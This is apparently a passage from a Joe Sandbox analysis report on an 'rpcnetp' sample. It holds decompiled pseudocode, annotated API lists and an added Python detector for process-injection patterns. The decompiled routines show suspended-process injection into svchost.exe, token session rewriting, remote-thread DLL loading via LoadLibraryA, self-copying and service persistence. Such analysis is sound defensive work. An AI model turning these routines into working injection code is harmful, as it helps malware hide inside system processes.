						if( *(_t124 - 0x20) != 0) {
							CloseHandle( *(_t124 - 0x20));
						}
					}
					if( *((intOrPtr*)(_t124 - 0x24)) == 0) {
						L13:
						_t84 =  *(_t124 - 0x1c);
						if(_t84 == 0) {
							goto L26;
						}
						if( *((intOrPtr*)(_t124 - 0x24)) == 0) {
							_t84 =  *0xa160c4;
						}
						WriteProcessMemory( *(_t124 - 0x34), _t84 -  *0xa160c4 + 0xa160c8, 0xa160c8, 0x80, 0); // executed; copy this module's 0x80-byte block at 0xa160c8 into the child's copy of the image at the same image-relative offset
						if( *((intOrPtr*)(_t124 - 0x24)) == 0) {
							ResumeThread( *(_t124 - 0x30));
							goto L23;
						} else {
							E00A124BC(0xa160c8,  *(_t124 - 0x34),  *((intOrPtr*)( *0xa16008 + 0x34)), 0, 0, _t124 - 0x1c, 0); // executed
							if( *(_t124 - 0x1c) != 0) {
								L23:
								if( *0xa16038 != 0) {
									E00A12758( *(_t124 - 0x34));
									 *(_t124 - 0x34) = 0;
								} else {
									_t91 = CreateThread(0, 0, E00A12758,  *(_t124 - 0x34), 0, _t124 - 0x48); // executed
									 *(_t124 - 0x3c) = _t91;
								}
								goto L26;
							}
							goto L18;
						}
					} else {
						if( *(_t124 - 0x1c) == 0) {
							L18:
							if( *(_t124 - 0x34) != 0) {
								TerminateProcess( *(_t124 - 0x34), 0);
								CloseHandle( *(_t124 - 0x34));
							}
							if( *(_t124 - 0x30) != 0) {
								CloseHandle( *(_t124 - 0x30));
							}
							goto L26;
						}
						E00A12842(_t124 - 0x190, 0); // executed
						_t101 = E00A127D2(_t117, _t124 - 0x190,  *(_t124 - 0x34), 0); // executed
						 *(_t124 - 0x1c) = _t101;
						goto L13;
					}
				}
			}

APIs
  • GetCurrentProcessId.KERNEL32(00A15410,00000180,00A132A3,00000000,00000001), ref: 00A12B03
  • OpenProcess.KERNEL32(001FFFFF,00000001,00000000), ref: 00A12B13
  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,?), ref: 00A12B92
  • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 00A12BA7
  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 00A12BB7
  • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000404,?,00000000,?,?,?,?,00000000), ref: 00A12BDD
  • CloseHandle.KERNEL32(?), ref: 00A12BEE
  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00A12C10
  • WriteProcessMemory.KERNELBASE(?,?,00A160C8,00000080,00000000), ref: 00A12C70
  • TerminateProcess.KERNEL32(?,00000000), ref: 00A12CA0
    • Part of subcall function 00A12598: GetSystemDirectoryA.KERNEL32(?,?), ref: 00A125AF
    • Part of subcall function 00A12598: lstrcatA.KERNEL32(?,\svchost.exe), ref: 00A125BD
  • CloseHandle.KERNEL32(?), ref: 00A12CA9
  • CloseHandle.KERNEL32(?), ref: 00A12CB7
  • ResumeThread.KERNEL32(?), ref: 00A12CC2
  • CreateThread.KERNELBASE(00000000,00000000,Function_00002758,?,00000000,?), ref: 00A12CDF
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Process$Create$CloseHandle$ThreadToken$BlockCurrentDirectoryDuplicateEnvironmentInformationMemoryOpenResumeSystemTerminateUserWritelstrcat
  • String ID:
  • API String ID: 1678882957-0
  • Opcode ID: 4aaf35f9ac2806ffdc51e1ca94e6dbfa22e654cb07cc6ce8ca645301e3bc28b7
  • Instruction ID: 94f7dac6129bd2c152f180ea16bf99a378b7f0cd7a5dcf7816b8349202cab922
  • Opcode Fuzzy Hash: 4aaf35f9ac2806ffdc51e1ca94e6dbfa22e654cb07cc6ce8ca645301e3bc28b7
  • Instruction Fuzzy Hash: AE61B371D02228AFDB21DF91DD49EEEBB79FF08751F108066F605A6160D7309A95CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 98%
			E00A132DE() {
				void* _v8;
				void* _v12;
				long _v16;
				long _t11;
				void* _t13;
				signed int _t14;
				void* _t18;
				void* _t20;
				intOrPtr _t26;
				signed int _t30;
				int _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t11 = GetVersion();
				_t33 = 0;
				 *0xa160b0 = _t11;
				if( *0xa1608c == 0 && _t11 < 0) { // GetVersion with the high bit set: Windows 9x/Me
					 *0xa16038 =  *0xa16038 | 0xffffffff;
				}
				_v8 = GetStdHandle(0xfffffff4); // STD_ERROR_HANDLE; in a child spawned by E00A12ADB this is the parent's inherited process handle
				_t13 = E00A13420(_t12); // executed
				_t37 = _t13;
				if(_t37 == _t33) {
					L11:
					_t14 =  *0xa16038;
					__eflags = _t14 - _t33;
					if(_t14 != _t33) {
						__eflags = _t14 - 2;
						if(_t14 == 2) {
							goto L23;
						}
						__eflags = _t37 - _t33;
						if(_t37 != _t33) {
							L17:
							 *0xa160ac = CreateEventA(_t33, _t33, _t33, _t33);
							L18:
							_t18 = CreateThread(_t33, _t33, E00A13161, _t33, _t33,  &_v16);
							_v12 = _t18;
							__eflags = _t18 - _t33;
							if(_t18 != _t33) {
								_t20 =  *0xa160ac;
								__eflags = _t20 - _t33;
								if(_t20 != _t33) {
									WaitForSingleObject(_t20, 0xffffffff);
									CloseHandle( *0xa160ac);
									 *0xa160ac = _t33;
								}
								WaitForSingleObject(_v12, 0xffffffff);
								CloseHandle(_v12);
							}
							E00A12FBB(_t35, _t33);
							goto L23;
						}
						__eflags = _t14 - 0xffffffff;
						if(_t14 != 0xffffffff) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t37 - _t33;
					if(_t37 != _t33) {
						goto L17;
					}
					E00A11EDA();
					goto L23;
				} else {
					_t26 =  *0xa16008;
					 *0xa16004 = _t33;
					_t45 =  *((intOrPtr*)(_t26 + 0x28)) - _t33;
					if( *((intOrPtr*)(_t26 + 0x28)) != _t33) {
						 *0xa16038 = 1;
						SetStdHandle(0xfffffff6, _v8); // STD_INPUT_HANDLE
						goto L11;
					}
					 *0xa16038 = 2;
					_t34 = E00A12123(_t33, CloseHandle, _t37, _t45);
					 *( *0xa16008 + 0x28) = 1;
					_t30 = E00A12ADB(_t34, _t35, CloseHandle, _t37, _t45, _t34);
					asm("sbb esi, esi");
					_t37 =  ~_t30 + 1;
					if(_t34 != 0) {
						CloseHandle(_t34);
					}
					if(_t37 != 0) {
						_t33 = 0;
						__eflags = 0;
						goto L11;
					} else {
						E00A12FBB(_t35, _t37);
						_t33 = 0;
						L23:
						if(_v8 != _t33) {
							CloseHandle(_v8);
						}
						ExitProcess(_t33);
					}
				}
			}

APIs
  • GetVersion.KERNEL32 ref: 00A132E7
  • GetStdHandle.KERNEL32(000000F4), ref: 00A13309
  • CloseHandle.KERNEL32(00000000), ref: 00A13363
  • SetStdHandle.KERNEL32(000000F6,?,00000000), ref: 00A13385
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A133B5
  • CreateThread.KERNEL32(00000000,00000000,Function_00003161,00000000,00000000,?), ref: 00A133CD
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A133EC
  • CloseHandle.KERNEL32 ref: 00A133F4
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A13401
  • CloseHandle.KERNEL32(?), ref: 00A13406
  • CloseHandle.KERNEL32(?,00000000), ref: 00A13416
  • ExitProcess.KERNEL32 ref: 00A13419
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Close$CreateObjectSingleWait$EventExitProcessThreadVersion
  • String ID:
  • API String ID: 2472693224-0
  • Opcode ID: 9eb75597c1dcf935af69cbe47b1ab0253da16cd132fdb7e25c43925eb284c1eb
  • Instruction ID: b05ab603d33a8bbd7e11d4ef8abb7e9af2e7640b874ad867f733c5c9b8b2a928
  • Opcode Fuzzy Hash: 9eb75597c1dcf935af69cbe47b1ab0253da16cd132fdb7e25c43925eb284c1eb
  • Instruction Fuzzy Hash: FE31C676800214EFCF21EFE59DC49EA7A78AB083A0711C225E625D71A1DB308FC6CB64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(Basic-block graph for E00A127D2, flattened: a127d2 VirtualAllocEx -> a127f8 lstrlenA, WriteProcessMemory (or straight to a12838 when the allocation fails) -> a12814 call a124bc when the write succeeded -> a1282a VirtualFreeEx -> a12838 return.)
C-Code - Quality: 89%
			E00A127D2(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t9;
				int _t13;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t9 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4); // executed; one page in the target process, MEM_COMMIT, PAGE_READWRITE
				_t22 = _t9;
				if(_t22 != 0) {
					_t13 = WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0); // executed; copy the NUL-terminated DLL path into the remote page
					if(_t13 != 0) {
						E00A124BC(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1); // executed; CreateRemoteThread with LoadLibraryA as start routine and the remote page as its argument
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000); // MEM_RELEASE with a non-zero dwSize fails, so the remote page stays mapped
				}
				return _v8;
			}

APIs
  • VirtualAllocEx.KERNELBASE(?,00000000,00001000,00001000,00000004), ref: 00A127EC
  • lstrlenA.KERNEL32(?,00000000), ref: 00A127FD
  • WriteProcessMemory.KERNELBASE(?,00000000,?,00000001), ref: 00A1280A
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000), ref: 00A12832
    • Part of subcall function 00A124BC: CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000), ref: 00A124E1
    • Part of subcall function 00A124BC: CloseHandle.KERNEL32(?), ref: 00A12523
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Virtual$AllocCloseCreateFreeHandleMemoryProcessRemoteThreadWritelstrlen
  • String ID:
  • API String ID: 4087653319-0
  • Opcode ID: f0ec0ba5758399cee83eb324f4a13f19e329afbb67503b0fa16348af5e65141c
  • Instruction ID: 5e3993ed9b9bb32cad0a7df1793a3bd231dca192a5486413ed30d15283850265
  • Opcode Fuzzy Hash: f0ec0ba5758399cee83eb324f4a13f19e329afbb67503b0fa16348af5e65141c
  • Instruction Fuzzy Hash: 5001D176500244BBD721CBA2DC49FDB3F3CEB89791F108024FB0991090D674D940C774
Uniqueness

Uniqueness Score: -1.00%
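
E00A12ADB above creates its target (svchost.exe from the system directory when E00A12598 resolves it, otherwise a renamed copy of its own image) with CREATE_SUSPENDED, after optionally duplicating a caller-supplied token and forcing its TokenSessionId to 0, then writes into the child and either resumes it or, through E00A127D2, loads its own .dll copy into the child with VirtualAllocEx, WriteProcessMemory and a CreateRemoteThread whose start routine is LoadLibraryA. The Python below is an added example and not part of the Joe Sandbox output: it parses API lines in the format this report uses and flags those patterns. Its sample input is constructed from the API lists of E00A12ADB and E00A127D2 on this page; note that those lists are static call sites grouped by function, so their order only approximates execution order, and a real detector would feed the same state machine with a time-ordered API trace.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

CREATE_SUSPENDED = 0x00000004          # dwCreationFlags bit
TOKEN_SESSION_ID = 0x0000000C          # TOKEN_INFORMATION_CLASS::TokenSessionId

# Position of dwCreationFlags in each process-creation API's argument list.
CREATION_FLAG_INDEX = {"CreateProcessA": 5, "CreateProcessW": 5,
                       "CreateProcessAsUserA": 6, "CreateProcessAsUserW": 6}

# A report line: "  • Api.MODULE(arg,arg,...), ref: 00A12C10". APIs without
# arguments carry no parentheses; subcall lines carry an extra prefix.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

Arg = Union[int, str, None]             # None stands for the report's "?"

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                            # address of the call site

    def arg(self, i: int) -> Arg:
        return self.args[i] if i < len(self.args) else None

@dataclass
class Indicator:
    kind: str
    ref: int
    detail: str

def _parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)
    return token                        # e.g. Function_00002758 or \svchost.exe

def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [_parse_arg(t) for t in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))

def parse_api_lines(text: str) -> List[ApiCall]:
    return [c for c in map(parse_api_line, text.splitlines()) if c is not None]

def find_injection_indicators(calls: List[ApiCall]) -> List[Indicator]:
    """Walk the calls in order and flag the patterns E00A12ADB and E00A127D2 show."""
    out: List[Indicator] = []
    suspended = 0
    alloc_seen = write_seen = False
    for c in calls:
        idx = CREATION_FLAG_INDEX.get(c.api)
        if idx is not None:
            flags = c.arg(idx)
            if isinstance(flags, int) and flags & CREATE_SUSPENDED:
                suspended += 1
                out.append(Indicator("create_suspended", c.ref,
                                     f"{c.api} dwCreationFlags=0x{flags:08X}"))
        elif c.api == "SetTokenInformation" and c.arg(1) == TOKEN_SESSION_ID:
            out.append(Indicator("token_session_rewrite", c.ref,
                                 "TokenSessionId rewritten before CreateProcessAsUser"))
        elif c.api == "VirtualAllocEx":
            alloc_seen = True
        elif c.api == "WriteProcessMemory":
            write_seen = True
        elif c.api == "CreateRemoteThread" and alloc_seen and write_seen:
            out.append(Indicator("remote_thread_chain", c.ref,
                                 "VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread"))
        elif c.api == "ResumeThread" and suspended and write_seen:
            out.append(Indicator("resume_after_write", c.ref,
                                 "suspended child resumed after WriteProcessMemory"))
    return out

# Constructed input: API lines copied from the E00A12ADB and E00A127D2 lists on this page.
SAMPLE_API_LINES = """\
  • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 00A12BA7
  • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000404,?,00000000,?,?,?,?,00000000), ref: 00A12BDD
  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00A12C10
  • WriteProcessMemory.KERNELBASE(?,?,00A160C8,00000080,00000000), ref: 00A12C70
  • ResumeThread.KERNEL32(?), ref: 00A12CC2
  • VirtualAllocEx.KERNELBASE(?,00000000,00001000,00001000,00000004), ref: 00A127EC
  • WriteProcessMemory.KERNELBASE(?,00000000,?,00000001), ref: 00A1280A
    • Part of subcall function 00A124BC: CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000), ref: 00A124E1
  • GetVersion.KERNEL32 ref: 00A132E7
"""

if __name__ == "__main__":
    for ind in find_injection_indicators(parse_api_lines(SAMPLE_API_LINES)):
        print(f"{ind.kind:22} @ {ind.ref:08X}  {ind.detail}")
```

Run against the sample it reports the TokenSessionId rewrite, both suspended process creations, the ResumeThread that follows a WriteProcessMemory, and the allocate-write-CreateRemoteThread chain. The API-level view complements the process-tree view behind the "Suspicious Svchost Process" Sigma hit in the Signatures section: one sees the parent, the other the handles and flags the parent used.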

Control-flow Graph

(Basic-block graph for E00A11EDA: a single block a11eda-a11eea calling StartServiceCtrlDispatcherA.)
C-Code - Quality: 100%
			E00A11EDA() {

				StartServiceCtrlDispatcherA(0xa16090); // executed
				return  *0xa1601c;
			}

APIs
  • StartServiceCtrlDispatcherA.ADVAPI32(00A16090,00A133A1,00000000), ref: 00A11EDF
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: CtrlDispatcherServiceStart
  • String ID:
  • API String ID: 3789849863-0
  • Opcode ID: 53791ac34ea6f65f05e67ac19f99a29b9498df4924b5724ce74db7c14f19d3d8
  • Instruction ID: fb21f4cb0396d115f65d5d7ce3a6b91aec2d8f08c3f6e9689cbb8e7a4cdcac9c
  • Opcode Fuzzy Hash: 53791ac34ea6f65f05e67ac19f99a29b9498df4924b5724ce74db7c14f19d3d8
  • Instruction Fuzzy Hash: 27A00278B40240DB8E70DBE4ED49AC87763B74C741300C844E556C2364C669E8C3EA31
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E00A12842(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t21;
				int _t24;
				int _t25;
				struct HINSTANCE__* _t28;
				signed short _t30;
				CHAR* _t37;
				void* _t40;
				long _t44;
				CHAR* _t46;
				void* _t48;

				_t21 = GetModuleFileNameA( *0xa160c4,  &_v268, 0x104);
				if(_t21 == 0) {
					return _t21;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t46 = _a4;
				lstrcpyA(_t46,  &_v268);
				_t24 = lstrlenA(_t46);
				_t9 = _t46 - 3; // -3
				_t37 = _t24 + _t9;
				_t25 = lstrcmpiA(_t37, _v8); // executed
				if(_t25 != 0) {
					lstrcpyA(_t37, _v8);
					_t25 = CopyFileA( &_v268, _t46, 0); // executed
					if(_t25 != 0) {
						_t25 = CreateFileA(_t46, 0xc0000000, 3, 0, 3, 0, 0); // executed
						_t48 = _t25;
						if(_t48 != 0xffffffff) {
							_t28 =  *0xa160c4;
							_t40 =  *((intOrPtr*)(_t28 + 0x3c)) + _t28;
							_t44 = _t40 - _t28 + 0x16;
							_a4 = _t44;
							if(_a8 != 0) {
								_t30 =  *(_t40 + 0x16) & 0x0000dfff;
							} else {
								_t30 = 0x00002000 |  *(_t40 + 0x16);
							}
							_a8 = _t30;
							SetFilePointer(_t48, _t44, 0, 0); // executed
							WriteFile(_t48,  &_a8, 2,  &_a4, 0); // executed
							_t25 = CloseHandle(_t48);
						}
					}
				}
				return _t25;
			}
















APIs
  • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00A1285D
  • lstrcpyA.KERNEL32(?,?), ref: 00A12893
  • lstrlenA.KERNEL32(?), ref: 00A12896
  • lstrcmpiA.KERNEL32(-00000003,00A112DC), ref: 00A128A4
  • lstrcpyA.KERNEL32(-00000003,00A112DC), ref: 00A128B6
  • CopyFileA.KERNEL32 ref: 00A128C3
  • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00A128DA
  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00A1291F
  • WriteFile.KERNELBASE(00000000,00000000,00000002,?,00000000), ref: 00A12931
  • CloseHandle.KERNEL32(00000000), ref: 00A12938
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: File$lstrcpy$CloseCopyCreateHandleModuleNamePointerWritelstrcmpilstrlen
  • String ID: dll$exe
  • API String ID: 3010676052-2048111982
  • Opcode ID: 4eb5f2a434dee52a668a620bff137f86e626694c8c1184003288bfff89bcd8d1
  • Instruction ID: dd06b54f04aa5780a25634731efdf7339108dd4e0b0839c199a087b8049a2ed5
  • Opcode Fuzzy Hash: 4eb5f2a434dee52a668a620bff137f86e626694c8c1184003288bfff89bcd8d1
  • Instruction Fuzzy Hash: D9314B75901118BBDB20DFA6DC48FEA3B7CEF497A0F108069FA45D7190D6748A86CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E00A1351D(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				int _t13;
				long _t17;
				void* _t18;
				void* _t20;
				void* _t23;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HWND__* _t36;

				_t36 = _a4;
				_t13 = _a8;
				_t31 = 0;
				if(_t13 == 0) {
					L17:
					KillTimer(_t36, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t36, 0x113, 0x113, 1) != 0);
					PostQuitMessage(_t31);
					if(_a8 != 0x11) {
						L12:
						_t17 = 0;
						L21:
						return _t17;
					}
					L20:
					_t17 = DefWindowProcA(_t36, _a8, _a12, _a16); // executed
					goto L21;
				}
				_t18 = _t13 - 0xf;
				if(_t18 == 0) {
					 *0xa16088 = 1;
					 *0xa1602c = _t31;
					 *0xa160b8 = _t31;
					L11:
					if(E00A12EA1(_t34, _a16) == 0) {
						_t20 =  *0xa160ac;
						if(_t20 != _t31) {
							 *0xa16088 = 1;
							SetEvent(_t20);
						}
						if( *0xa16088 != _t31) {
							goto L17;
						} else {
							SetTimer(_t36, 0x64, 0xdbba0, _t31);
							goto L12;
						}
					}
					goto L12;
				}
				_t23 = _t18 - 0x102;
				if(_t23 == 0) {
					if(_a12 != 0x64) {
						goto L20;
					}
					KillTimer(_t36, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t36, 0x113, 0x113, 1) != 0);
					E00A1327B(_t34, _t36, 0x113); // executed
					if( *0xa16038 == 0) {
						SetTimer(_t36, 0x64, 0xdbba0, 0); // executed
					}
					goto L20;
				}
				if(_t23 == 0x2ed) {
					goto L11;
				}
				goto L20;
			}















APIs
  • KillTimer.USER32(?,00000064), ref: 00A1355C
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 00A13570
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 00A13596
  • SetEvent.KERNEL32(?), ref: 00A135D5
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 00A135EC
  • KillTimer.USER32(?,00000064), ref: 00A135F7
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 00A1360B
  • PostQuitMessage.USER32(00000000), ref: 00A13616
  • DefWindowProcA.USER32(?,00000011,?,?), ref: 00A1362C
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Timer$Message$KillPeek$EventPostProcQuitWindow
  • String ID: d
  • API String ID: 2149785620-2564639436
  • Opcode ID: ab161969736995bb59142e4bd404a1794e6fbd0e1261600aa34e5faa6f1c9fc5
  • Instruction ID: f111b4850d15c0897b954ae918eabbcee6f5e15aab22f9e57378d39ed036c871
  • Opcode Fuzzy Hash: ab161969736995bb59142e4bd404a1794e6fbd0e1261600aa34e5faa6f1c9fc5
  • Instruction Fuzzy Hash: 7031BF72540204BEDF20DFA4AD89FEB7F6EAB15B64F04C018F705E51A1C7758B82DA21
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 75%
			E00A12658(void* __ecx) {
				void* _v8;
				long _v12;
				int _t6;
				void* _t11;
				struct HWND__* _t13;
				intOrPtr _t24;

				 *0xa160a4 = CreateEventA(0, 1, 0, 0);
				 *0xa16010 = 0x10;
				 *0xa1601c = 0x42a;
				 *0xa16020 = 1;
				_t6 = RegisterServiceCtrlHandlerA("rpcnet", E00A11EEB);
				 *0xa160bc = _t6;
				if(_t6 != 0) {
					_push(0);
					_push(0x1388);
					_t24 = 2;
					_push(_t24);
					 *0xa16018 = 1; // executed
					E00A12266(); // executed
					 *0xa16018 = 5;
					E00A12266(4, 0, 0); // executed
					E00A12296(); // executed
					 *0xa1601c = 0;
					 *0xa16020 = 0; // executed
					_t11 = CreateThread(0, 0, E00A13161, 0, 0,  &_v12); // executed
					_v8 = _t11;
					if(_t11 != 0) {
						WaitForSingleObject( *0xa160a4, 0xffffffff);
						_t13 =  *0xa1600c;
						if(_t13 != 0) {
							PostMessageA(_t13, 0x11, 0, 0);
						}
						WaitForSingleObject(_v8, 0x7530);
						CloseHandle(_v8);
					} else {
						 *0xa16020 = _t24;
					}
					CloseHandle( *0xa160a4);
					_t6 = E00A12266(1, 0, 0);
				}
				return _t6;
			}










APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A12668
  • RegisterServiceCtrlHandlerA.ADVAPI32(rpcnet,00A11EEB), ref: 00A12697
    • Part of subcall function 00A12266: SetServiceStatus.ADVAPI32(00A16010,?,00A126C0,00000002,00001388,00000000), ref: 00A1228C
    • Part of subcall function 00A12296: RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 00A122B1
    • Part of subcall function 00A12296: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00A160C8,00000080,00000002,00000000,00000001), ref: 00A122CF
    • Part of subcall function 00A12296: RegEnumValueA.ADVAPI32 ref: 00A12300
    • Part of subcall function 00A12296: RegCloseKey.ADVAPI32(?), ref: 00A12309
  • CreateThread.KERNELBASE(00000000,00000000,00A13161,00000000,00000000,?), ref: 00A126F1
  • WaitForSingleObject.KERNEL32(000000FF), ref: 00A12714
  • PostMessageA.USER32 ref: 00A12724
  • WaitForSingleObject.KERNEL32(?,00007530), ref: 00A12732
  • CloseHandle.KERNEL32(?), ref: 00A12737
  • CloseHandle.KERNEL32 ref: 00A12743
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Close$CreateHandleObjectServiceSingleValueWait$CtrlEnumEventHandlerMessageOpenPostQueryRegisterStatusThread
  • String ID: rpcnet
  • API String ID: 2965456292-717388198
  • Opcode ID: 03f62e30dcc2cda566649fea241f45f84f8f22b689ced2ebd73a5e6cdc2bc40f
  • Instruction ID: 92a43053453e3f98477f2486ba6a0ce95f252086c30b0c77c5fd196aea37f793
  • Opcode Fuzzy Hash: 03f62e30dcc2cda566649fea241f45f84f8f22b689ced2ebd73a5e6cdc2bc40f
  • Instruction Fuzzy Hash: E6214175902264BFC720EFE6AC49EDB7E6CFF09791B10C519F205D51A0C7B48682DBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 81%
			E00A13161(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				struct HWND__* _t14;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0xa15430);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0xa160c4;
				 *0x00A16070 = _t11;
				_t30 = _t35 - 0x138;
				 *0x00A16084 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103); // executed
				RegisterClassA(0xa16060); // executed
				_t14 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0); // executed
				 *0xa1600c = _t14;
				asm("sbb eax, eax");
				SetTimer( *0xa1600c, 0x64, ( ~( *0xa16038) & 0xffff1d70) + 0xea60, 0); // executed
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34); // executed
				}
				 *0xa1600c = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E00A1159C(0);
			}








APIs
